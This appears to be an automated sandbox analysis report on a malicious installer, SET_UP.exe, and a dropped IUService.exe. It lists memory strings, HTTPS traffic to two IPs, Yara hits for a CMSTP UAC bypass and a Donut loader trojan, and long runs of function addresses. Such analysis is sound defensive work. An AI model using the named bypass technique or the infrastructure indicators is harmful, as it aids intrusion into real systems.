                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: SET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2101675445.000000000333F000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2105415101.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000000.2108717164.00000000008C1000.00000020.00000001.01000000.00000007.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000000.2131734150.0000000000B5D000.00000020.00000001.01000000.00000009.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp.4.drString found in binary or memory: https://www.remobjects.com/ps
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.89.250:443 -> 192.168.2.4:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.214.186:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: IUService.exe PID: 1284, type: MEMORYSTR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 34.2.IUService.exe.931cb29.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 34.2.IUService.exe.9361bf6.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 34.2.IUService.exe.93627f6.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0254FD83 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0254FD83
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025003C30_2_025003C3
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0254FD830_2_0254FD83
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252F2480_2_0252F248
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251F2100_2_0251F210
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025132C00_2_025132C0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250C2E00_2_0250C2E0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025192BE0_2_025192BE
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025383300_2_02538330
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025233D00_2_025233D0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025043C00_2_025043C0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025393B00_2_025393B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025240490_2_02524049
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025110780_2_02511078
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250A0600_2_0250A060
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251F0000_2_0251F000
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025230800_2_02523080
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025071500_2_02507150
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025321570_2_02532157
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0253B1400_2_0253B140
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025051800_2_02505180
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251B1B00_2_0251B1B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251966E0_2_0251966E
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025396100_2_02539610
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251E6000_2_0251E600
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025176060_2_02517606
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250F6FE0_2_0250F6FE
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252C7100_2_0252C710
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251D7060_2_0251D706
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025347C00_2_025347C0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025417F00_2_025417F0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025127EE0_2_025127EE
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025304580_2_02530458
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0253D4700_2_0253D470
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025254660_2_02525466
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025284D00_2_025284D0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025404AB0_2_025404AB
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025325560_2_02532556
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025415100_2_02541510
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252A53D0_2_0252A53D
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252E5D70_2_0252E5D7
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252D5F30_2_0252D5F3
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025275B00_2_025275B0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252AA450_2_0252AA45
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02534A100_2_02534A10
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02532AD00_2_02532AD0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0253AAC00_2_0253AAC0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02507B100_2_02507B10
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02509B000_2_02509B00
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02505B300_2_02505B30
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02541B300_2_02541B30
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252CBE00_2_0252CBE0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02523BB20_2_02523BB2
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251E8D00_2_0251E8D0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250A9100_2_0250A910
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252791D0_2_0252791D
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_025209E70_2_025209E7
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0252D9B60_2_0252D9B6
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02517E400_2_02517E40
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0250AE100_2_0250AE10
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02541EC00_2_02541EC0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02507FA00_2_02507FA0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02539FA00_2_02539FA0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02539C200_2_02539C20
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0251ECE00_2_0251ECE0
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02534C800_2_02534C80
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0253DD600_2_0253DD60
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02537D6F0_2_02537D6F
                      Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_02508D800_2_02508D80
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F00434_2_5000F004
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F00C34_2_5000F00C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F01434_2_5000F014
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F01C34_2_5000F01C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F29C34_2_5000F29C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2A434_2_5000F2A4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2AC34_2_5000F2AC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2B434_2_5000F2B4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2BC34_2_5000F2BC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2C434_2_5000F2C4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2CC34_2_5000F2CC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2D434_2_5000F2D4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2DC34_2_5000F2DC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2E434_2_5000F2E4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2EC34_2_5000F2EC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2F434_2_5000F2F4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F2FC34_2_5000F2FC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F30434_2_5000F304
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F30C34_2_5000F30C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F31434_2_5000F314
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F31C34_2_5000F31C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F32434_2_5000F324
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F32C34_2_5000F32C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F33434_2_5000F334
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F33C34_2_5000F33C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F34434_2_5000F344
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F34C34_2_5000F34C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F35434_2_5000F354
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F35C34_2_5000F35C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F36434_2_5000F364
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F36C34_2_5000F36C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F37434_2_5000F374
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F37C34_2_5000F37C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F38434_2_5000F384
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F38C34_2_5000F38C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F39434_2_5000F394
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F39C34_2_5000F39C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3A434_2_5000F3A4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3AC34_2_5000F3AC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3B434_2_5000F3B4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3BC34_2_5000F3BC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3C434_2_5000F3C4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3CC34_2_5000F3CC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3D434_2_5000F3D4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3DC34_2_5000F3DC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3E434_2_5000F3E4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3EC34_2_5000F3EC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3F434_2_5000F3F4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F3FC34_2_5000F3FC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F40434_2_5000F404
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F40C34_2_5000F40C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F41434_2_5000F414
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F41C34_2_5000F41C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F42434_2_5000F424
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F42C34_2_5000F42C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F43434_2_5000F434
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F43C34_2_5000F43C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F44434_2_5000F444
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F49C34_2_5000F49C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4A434_2_5000F4A4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4AC34_2_5000F4AC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4B434_2_5000F4B4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4BC34_2_5000F4BC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4C434_2_5000F4C4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4CC34_2_5000F4CC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4D434_2_5000F4D4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000F4DC34_2_5000F4DC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000B70034_2_5000B700
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCAC34_2_5000DCAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCB434_2_5000DCB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCBC34_2_5000DCBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCC434_2_5000DCC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCCC34_2_5000DCCC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCD434_2_5000DCD4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCDC34_2_5000DCDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCE434_2_5000DCE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCEC34_2_5000DCEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCF434_2_5000DCF4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DCFC34_2_5000DCFC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD0434_2_5000DD04
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD0C34_2_5000DD0C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD1434_2_5000DD14
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD1C34_2_5000DD1C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD2434_2_5000DD24
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD2C34_2_5000DD2C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD3434_2_5000DD34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD3C34_2_5000DD3C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED4434_2_5000ED44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD4434_2_5000DD44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED4C34_2_5000ED4C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD4C34_2_5000DD4C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED5434_2_5000ED54
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD5434_2_5000DD54
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED5C34_2_5000ED5C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD5C34_2_5000DD5C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED6434_2_5000ED64
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD6434_2_5000DD64
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED6C34_2_5000ED6C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD6C34_2_5000DD6C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED7434_2_5000ED74
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD7434_2_5000DD74
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED7C34_2_5000ED7C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD7C34_2_5000DD7C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED8434_2_5000ED84
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD8434_2_5000DD84
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED8C34_2_5000ED8C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD8C34_2_5000DD8C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED9434_2_5000ED94
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD9434_2_5000DD94
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000ED9C34_2_5000ED9C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DD9C34_2_5000DD9C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDA434_2_5000EDA4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDA434_2_5000DDA4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDAC34_2_5000EDAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDAC34_2_5000DDAC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDB434_2_5000EDB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDB434_2_5000DDB4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDBC34_2_5000EDBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDBC34_2_5000DDBC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDC434_2_5000EDC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDC434_2_5000DDC4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDCC34_2_5000EDCC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDCC34_2_5000DDCC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDD434_2_5000DDD4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDD434_2_5000EDD4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDDC34_2_5000DDDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDDC34_2_5000EDDC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDE434_2_5000DDE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDE434_2_5000EDE4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDEC34_2_5000DDEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDEC34_2_5000EDEC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDF434_2_5000DDF4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDF434_2_5000EDF4
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DDFC34_2_5000DDFC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EDFC34_2_5000EDFC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE0434_2_5000DE04
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE0434_2_5000EE04
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE0C34_2_5000DE0C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE0C34_2_5000EE0C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE1434_2_5000DE14
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE1434_2_5000EE14
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE1C34_2_5000DE1C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE1C34_2_5000EE1C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE2434_2_5000DE24
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE2434_2_5000EE24
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE2C34_2_5000DE2C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE2C34_2_5000EE2C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE3434_2_5000DE34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE3434_2_5000EE34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE3C34_2_5000DE3C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE3C34_2_5000EE3C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE4434_2_5000DE44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE4434_2_5000EE44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE4C34_2_5000DE4C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE4C34_2_5000EE4C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000DE5434_2_5000DE54
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE5434_2_5000EE54
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeCode function: 34_2_5000EE5C34_2_5000EE5C
